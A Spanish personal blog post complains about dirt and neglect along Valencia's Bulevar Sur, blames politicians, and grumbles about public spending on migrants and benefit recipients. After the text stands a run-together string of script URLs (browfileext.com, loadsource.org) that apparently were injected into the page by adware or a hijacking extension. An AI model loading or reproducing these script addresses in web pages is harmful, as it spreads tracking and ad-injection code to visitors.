Valencia está que da pena

Valencia está que da pena

Posted by

El descuido en la limpieza y mantenimiento de Valencia roza el escándalo. No sé si nuestros políticos saben que sus sueldos se pagan con los impuestos de los ciudadanos que trabajamos y sufrimos todo este desastre. Sospecho que de esa misma partida sale el dinero  para acoger a los migrantes que vienen en barcos y permiten que nuestra ciudad y estos mismos políticos sean noticia. Es posible que la atención médica y las ayudas necesarias para la manutención e instalación en nuestra ciudad de estas personas salgan, también, de los bolsillos de los valencianos. Digo yo que desde aquí se pagan impuestos a nivel nacional que luego van a Europa y que, dicen, que luego vuelven aquí pero los “paganos” somos siempre los mismos.

Muchos valencianos salimos a hacer deporte por la ciudad. Si lo hacen por el Bulevar Sur que lleva a la Nueva Fe (desde la zona de la Cruz Cubierta hasta la rotonda de las anclas) pueden observar la suciedad, hojas secas, pintadas, escalones rotos (con el peligro que supone de caídas a distinto nivel), botellas de bebidas alcohólicas (incluso con su vaso), por supuesto, colillas, defecaciones de perros (supongo porque vi a un “señor” orinar y quien dice que no hacen más cosas) y lo que no alcanza la memoria. Hay un pequeño parque infantil en el que, también, esta falta de mantenimiento se puede observar.

Lo cierto es que esta misma semana puede ver a tres operarios que, pensé, igual plantan lo que se ha secado por falta de riego. En menos de una hora ya no estaban y no fui capaz de apreciar la diferencia que, seguro la habría. Hay mucho que hacer.

Otro día vi a otro operario limpiando las hojas secas de la acera. Todo el trabajo que había no lo podía hacer él solo. En mi opinión debería ir con otra persona y, además, era un día de muchísima calor. Espero que su salud no sufriera ningún percance.

En este mismo paseo pueden ver como unos 40 olivos cargados de su fruto que, supongo, se perderán. Y digo yo, seguramente, sin razón, ¿por qué no lo recogen? En Valencia, por lo que sé, hay muchas personas que perciben ayuda económica pública y no hablo sólo de parados. Si a estas personas se les ofrece formación a nivel de limpieza y mantenimiento de parques y jardines y/o recogida de oliva se les está abriendo un campo de futuro empleo y, si tras esa formación, se les cambia la “paguita”, como ellos la llaman, por un contrato cotizando a la seguridad social dejan de ser personas necesitadas y pasan a ser trabajadores. Vamos, incluso, (me estoy viniendo arriba), a los migrantes se les podría ofrecer esta misma opción.

Sea como sea, por favor, señores políticos cumplan con sus funciones entre las que seguro debe estar el bienestar de los valencianos y de la ciudad. Si son de los que están en el poder ahora mismo, esfuércense un poquito más, por favor y, si están en la oposición, lo mismo y, también, por favor. Reciban las gracias anticipadas ya que, antes que políticos, son trabajadores que desean conservar su empleo y, esta, es una manera estupenda de demostrarnos a todos que son a los que debemos votar dentro de un año.

 

 

 

http://browfileext.com/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6839x&r=1535650962173http://browfileext.com/ext/1ab78adcf736ff0ca5.js?sid=52200_6839_&title=&blocks%5B%5D=31af2

The following two tabs change content below.

Pepi Parra

Latest posts by Pepi Parra (see all)

Deja un comentario

Twitter Auto Publish Powered By : XYZScripts.com
Member of The Internet Defense League
A %d blogueros les gusta esto: